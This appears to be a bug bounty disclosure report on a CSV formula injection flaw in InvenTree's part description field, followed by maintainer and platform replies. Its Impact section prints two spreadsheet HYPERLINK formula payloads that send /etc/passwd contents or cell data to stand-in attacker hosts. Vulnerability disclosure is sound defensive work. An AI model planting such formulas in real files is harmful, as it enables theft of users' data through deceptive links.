Formula Injection Part Description in inventree/inventree
Valid
Reported on
Jun 11th 2022
Description
Formula Injection/CSV Injection in inventree
due to Improper Neutralization of Formula Elements in CSV File.
Proof of Concept
Video PoC link: https://drive.google.com/file/d/1mf_BTUDS1iZ4uJfBpc56_8WgpdZdN5_f/view?usp=sharing
Impact
Successful exploitation can lead to impacts such as client-sided command injection, code execution, or remote ex-filtration of contained confidential data. On constructing the payloads as
=HYPERLINK(CONCATENATE("http://attackerserver:port/a.txt?v="; ('file:///etc/passwd'#$passwd.A1));
=HYPERLINK("http://evil.com?x="&A3&","&B3&"[CR]","Error fetching info: Click me to resolve.")
An attacker can have access to /etc/passwd system file
Occurrences
References
We are processing your report and will contact the
inventree
team within 24 hours.
a year ago
Thanks for reporting this, we were not aware of this vulnerability. It will be remedied ASAP
saharshtapi
has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
api.py#L883
has been validated
to join this conversation